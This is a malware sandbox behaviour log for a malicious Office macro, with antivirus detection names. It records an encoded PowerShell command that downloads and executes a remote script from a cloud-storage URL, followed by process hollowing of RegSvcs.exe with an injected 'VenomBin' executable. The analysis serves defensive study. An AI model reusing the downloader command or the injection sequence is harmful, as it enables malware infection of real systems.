command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000005dc
1 1 0

NtResumeThread

thread_handle: 0x000005c8
suspend_count: 1
process_identifier: 3036
1 0 0

NtResumeThread

thread_handle: 0x000005f4
suspend_count: 1
process_identifier: 3036
1 0 0

NtResumeThread

thread_handle: 0x00000298
suspend_count: 1
process_identifier: 2184
1 0 0

NtResumeThread

thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2184
1 0 0

NtResumeThread

thread_handle: 0x00000438
suspend_count: 1
process_identifier: 2184
1 0 0

NtResumeThread

thread_handle: 0x0000055c
suspend_count: 1
process_identifier: 2184
1 0 0

CreateProcessInternalW

thread_identifier: 2408
thread_handle: 0x00000374
process_identifier: 2412
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
track: 1
command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000378
1 1 0

NtGetContextThread

thread_handle: 0x00000374
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000378
3221225496 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000378
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÃÎD`à 0‚®  @ `…` KÀ“ à  H.text´€ ‚ `.rsrc“ À „@@.reloc à@B
base_address: 0x000d0000
process_identifier: 2412
process_handle: 0x00000378
1 1 0

WriteProcessMemory

buffer:
base_address: 0x000d2000
process_identifier: 2412
process_handle: 0x00000378
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€ À¼Ã×4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°|StringFileInfoX000004b0Comments"CompanyName: FileDescriptionVenomBin0FileVersion2.7.0.0: InternalNameVenombin.exeHLegalCopyrightCopyright © 2021*LegalTrademarksB OriginalFilenameVenombin.exe2 ProductNameVenomBin4ProductVersion2.7.0.08Assembly Version2.7.0.0<?xml version="1.0" encoding="utf-8"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <application xmlns="urn:schemas-microsoft-com:asm.v3"> <windowsSettings> <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true/pm</dpiAware> <dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">PerMonitorV2, PerMonitor</dpiAwareness> <longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware> </windowsSettings> </application> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /> </dependentAssembly> </dependency> </assembly>
base_address: 0x001dc000
process_identifier: 2412
process_handle: 0x00000378
1 1 0

WriteProcessMemory

buffer:   °0
base_address: 0x001de000
process_identifier: 2412
process_handle: 0x00000378
1 1 0

WriteProcessMemory

buffer:
base_address: 0x7efde008
process_identifier: 2412
process_handle: 0x00000378
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5284014
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000374
process_identifier: 2412
1 0 0

NtResumeThread

thread_handle: 0x00000374
suspend_count: 1
process_identifier: 2412
1 0 0

NtResumeThread

thread_handle: 0x000003b8
suspend_count: 1
process_identifier: 2184
1 0 0

CreateProcessInternalW

thread_identifier: 2388
thread_handle: 0x00000088
process_identifier: 2380
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\chcp.com
track: 1
command_line: chcp 65001
filepath_r: C:\Windows\system32\chcp.com
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2452
thread_handle: 0x00000088
process_identifier: 2464
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping -n 10 localhost
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

thread_identifier: 296
thread_handle: 0x00000084
process_identifier: 2356
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
track: 1
command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

NtResumeThread

thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2356
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2356
1 0 0

NtResumeThread

thread_handle: 0x00000158
suspend_count: 1
process_identifier: 2356
1 0 0

NtResumeThread

thread_handle: 0x000001cc
suspend_count: 1
process_identifier: 2356
1 0 0
Lionic Trojan.MSExcel.Valyria.4!c
Elastic malicious (high confidence)
MicroWorld-eScan VB:Trojan.Valyria.8184
FireEye VB:Trojan.Valyria.8184
ALYac VB:Trojan.Valyria.8184
VIPRE VB:Trojan.Valyria.8184
Sangfor VBA.Sus.Obf
K7AntiVirus Trojan ( 00536d111 )
K7GW Trojan ( 00536d111 )
Arcabit VB:Trojan.Valyria.D1FF8
VirIT Office.VBA_Macro_Heur
Cyren ABRisk.YFZX-
Symantec CL.Downloader!gen9
ESET-NOD32 VBA/TrojanDownloader.Agent.ZAK
Cynet Malicious (score: 99)
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan.MSOffice.SAgent.gen
BitDefender VB:Trojan.Valyria.8184
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
Tencent Trojan.MsOffice.MacroV.11000076
Emsisoft VB:Trojan.Valyria.8184 (B)
F-Secure Heuristic.HEUR/Macro.Downloader.MRAIR.Gen
McAfee-GW-Edition BehavesLike.OLE2.Downloader.cg
Ikarus Win32.Outbreak
Avira HEUR/Macro.Downloader.MRAIR.Gen
MAX malware (ai score=89)
Gridinsoft Backdoor.U.Quasar.bot
ZoneAlarm HEUR:Trojan.MSOffice.SAgent.gen
GData VB:Trojan.Valyria.8184
Google Detected
Acronis suspicious
McAfee RDN/Generic Downloader.x
Zoner Probably Heur.W97ShellS
Rising Downloader.Agent/VBA!8.109E7 (TOPIS:E0:ojTsLykzVKS)
SentinelOne Static AI - Malicious OLE
Fortinet VBA/Agent.3608!tr
AVG Script:SNH-gen [Drp]
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe